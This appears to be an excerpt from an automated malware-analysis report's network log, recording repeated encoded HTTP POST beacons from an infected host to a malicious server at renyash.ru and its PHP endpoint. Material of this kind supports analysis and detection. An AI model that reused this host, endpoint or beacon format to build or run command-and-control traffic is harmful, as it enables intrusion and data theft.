                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 24 04 22 10 32 55 36 15 31 0a 29 0f 2b 13 25 20 22 05 3e 32 36 5c 25 38 37 04 39 38 02 51 35 14 23 00 30 2d 2e 01 33 00 25 0e 2b 3b 2c 5d 00 10 20 19 33 30 21 5d 2e 31 35 55 3d 0f 24 40 22 2c 3f 5d 33 28 2e 56 20 0d 3f 5b 22 2d 25 1f 2f 21 3f 1a 2d 0a 31 03 39 38 23 01 23 35 2b 55 00 14 23 0e 25 5f 3b 00 3d 0d 1d 09 20 2b 3e 12 33 02 2c 10 3d 12 0e 1e 2a 2b 3d 52 2b 2c 29 0e 21 2f 21 1d 28 30 27 1b 27 54 2d 15 27 3c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98$"2U61)+% ">26\%8798Q5#0-.3%+;,] 30!].15U=$@",?]3(.V ?["-%/!?-198##5+U#%_;= +>3,=*+=R+,)!/!(0''T-'<!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                123192.168.2.550105104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:06.627636909 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:06.986160994 CET1060OUTData Raw: 5f 57 58 58 5f 5f 58 51 5c 5f 50 57 54 52 59 5a 59 57 5b 51 57 50 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _WXX__XQ\_PWTRYZYW[QWPTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X'0Y<T? !Z',_*)=_>+?#T'<%+< 4<>;.^''P*
                                                                                                                                Jan 11, 2025 15:04:07.095743895 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:07.342721939 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYVrpgHp3MUp2Q6P3nUTDqwjlc5tstaE3CyUNgxT9Rwd%2BZjnWdbNFiY75BfgsyOJP06P%2BT1KbkqIIPcuM1yRPm%2F1f7ieFqy8OYuwQaiTfibk0xphais1L%2FzzDKMu0Z4Nku0RYmHr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574400be741e0-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7764&min_rtt=1722&rtt_var=12731&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=29162&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                124192.168.2.550106104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:07.472664118 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:07.829938889 CET1060OUTData Raw: 5f 54 5d 54 5f 53 5d 53 5c 5f 50 57 54 56 59 5e 59 5d 5b 5c 57 55 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _T]T_S]S\_PWTVY^Y][\WUTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2#(<2(]!1"]$3=95_*]$V7)$-*%<647T(+.^''P*)
                                                                                                                                Jan 11, 2025 15:04:07.931768894 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:08.178534985 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cp8C6xKBg2hfB0fsh15rU44GQ%2BaAAuPR3K2EejXya3b7fy6iaRnqxDSvPTInFwL3lkFhrevvplLYjxAPjCC4aoDubIsnzEoKgucmNq24DpSuAcyZcH30QINk2Sqthz7ZnLqb%2FiUi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057445492e5e76-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4509&min_rtt=1625&rtt_var=6378&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=59106&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                125192.168.2.550107104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:08.301055908 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:08.658121109 CET1060OUTData Raw: 5f 52 58 5e 5a 5b 5d 53 5c 5f 50 57 54 5c 59 5c 59 5c 5b 5e 57 54 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _RX^Z[]S\_PWT\Y\Y\[^WTTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& <14]!!)'% *9)+$7*%<:?%;!'*;.^''P*
                                                                                                                                Jan 11, 2025 15:04:08.759926081 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:08.927937984 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBJxZ1s8XjYiHc3%2FEo%2FGy9PZvm576T3NMQR9LjrkTS80KvQp5PQF8L%2FsuWMwJne94TsdgqNncAeaI1nREbRgcxK9S0jH%2BgJn67ig7qbMNTLzBM6YLROLit%2FMFrSojPfTes82GJla"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005744a7b6b4308-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4588&min_rtt=1705&rtt_var=6407&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=58927&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                126192.168.2.550108104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:09.069673061 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:09.423779964 CET1060OUTData Raw: 5a 50 5d 5b 5f 5d 58 54 5c 5f 50 57 54 51 59 58 59 54 5b 50 57 56 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP][_]XT\_PWTQYXYT[PWVT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&4<" #>_364Y=96>+0V ).T$:W+&+Y5'*;.^''P*5
                                                                                                                                Jan 11, 2025 15:04:09.541877985 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:09.782767057 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:09 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wVEzhB9p8LBfNnPPppB13UiiuRAjqPXRBFi7E%2FWP9WsJi8Jp0wlsqn9Y8hREmPb2vtNrsEBq%2B1ZjtS6WJMYH2hBVp0%2BNY0CEeXkXTt0bGH3NmlfI80oxF683AjB2LqMzNl6m3ViV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005744f59a08c4b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5176&min_rtt=2064&rtt_var=6999&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=54142&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                127192.168.2.550109104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:09.916034937 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:10.267436981 CET1060OUTData Raw: 5f 50 5d 58 5f 5a 58 51 5c 5f 50 57 54 53 59 5b 59 51 5b 58 57 5f 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _P]X_ZXQ\_PWTSY[YQ[XW_TQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%(]($]7>^'>%\=;##$:(64!(=.^''P*=
                                                                                                                                Jan 11, 2025 15:04:10.378802061 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:10.572925091 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5l8odtdkI6nNvtW%2BklLnrG57BRFG4h5OQnN8HP4a7Zudfr8zPVTzd0BuJ3mWeMJW5glj9gdXcwZ5FR35mRRt%2Bl6uijHcUM0zA7JpH4WiENpha7O2B1aUDpx9WaJMrWyBgS5zFgP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005745498434304-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3524&min_rtt=1732&rtt_var=4233&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=90863&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                128192.168.2.550110104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:10.695331097 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:11.048710108 CET1060OUTData Raw: 5a 57 5d 54 5a 58 5d 50 5c 5f 50 57 54 5c 59 59 59 5d 5b 51 57 5e 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]TZX]P\_PWT\YYY][QW^TX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_'04\+"4!">Z&6+)99>;##*5$/-(&["7V>;.^''P*
                                                                                                                                Jan 11, 2025 15:04:11.163177967 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:11.342035055 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:11 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvOTvKKSXWrtbHZQfWKtq1GCRVVnJn%2BgQwiGnWG%2FOEeuNjKDOodFPA8mn50OWDkiSYS%2BwZcFkCzEMhxrS6Gn6ZEO1Bv8lmFEsJYuCN4EUJ0Gpvj%2BzL5eeXQbAfz8oVbCKL%2BgZFP6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005745979a35e60-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3261&min_rtt=1702&rtt_var=3757&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=102969&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                129192.168.2.550111104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:11.473635912 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:11.830089092 CET1060OUTData Raw: 5a 54 5d 55 5f 5b 58 55 5c 5f 50 57 54 50 59 5b 59 56 5b 58 57 55 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZT]U_[XU\_PWTPY[YV[XWUT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2 _?"#W9$4=9);+#!0?:W+#[6>.^''P*1
                                                                                                                                Jan 11, 2025 15:04:11.917063951 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:12.164717913 CET795INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLNBHrssmLaBTDFyw%2FmsPrMVgzeux1imw2omU2OpS1pq9Whlff4yCD9fFjbYAzTNL0V1J8fut1mE7VIkRBSRpj0M7OkIcUgPUwj%2F2SPtB7r66pnMAc6ibujCbJs2ySeI343uv8Ep"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005745e3e434411-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2359&min_rtt=1742&rtt_var=1887&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=218628&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:04:12.251452923 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                130192.168.2.550112104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:12.181395054 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                131192.168.2.550113104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:12.384802103 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:12.736236095 CET1060OUTData Raw: 5f 53 5d 59 5f 58 58 54 5c 5f 50 57 54 5d 59 58 59 52 5b 59 57 5f 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _S]Y_XXT\_PWT]YXYR[YW_T[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_&0<T'71>[$% ?**)+0P#)W$"R(^ '7(;.^''P*
                                                                                                                                Jan 11, 2025 15:04:12.838288069 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:13.095115900 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:13 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1S1jhn40brXG7bBFcZ6LwsfugO9WoxH8Iwr13uD28eg%2B%2BA9wczX701NVXI%2FKmnM%2BlBRMTqECtRCqEGwOKWXhmIxe51BRdPLW4FJWx4zQABBFlsRY4bQrkRXelRKutFsZnOXgiAaj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057463fe157288-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8591&min_rtt=1957&rtt_var=14002&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=26530&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                132192.168.2.550114104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:13.227260113 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:13.580054998 CET1060OUTData Raw: 5f 5e 5d 58 5f 5e 5d 53 5c 5f 50 57 54 51 59 5c 59 52 5b 5b 57 55 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _^]X_^]S\_PWTQY\YR[[WUT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]&,_(1$^7W:&% ^>9_)V70/&W+68!7$>;.^''P*5
                                                                                                                                Jan 11, 2025 15:04:13.681572914 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:13.962636948 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:13 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghqJkhtgvqB53JpamiZ0i82TZMTGWbrqjp%2BLSvXBeSRyZtvXCfqMHJa5DSrpYY5zxKYA2PV4jfxnMGEIyWRahk%2FWUNIxV79zdJzpdWgNg8Edq%2FzuFZmDtpjFOuwX8ZyevsRzNOCz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574693e8732fc-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
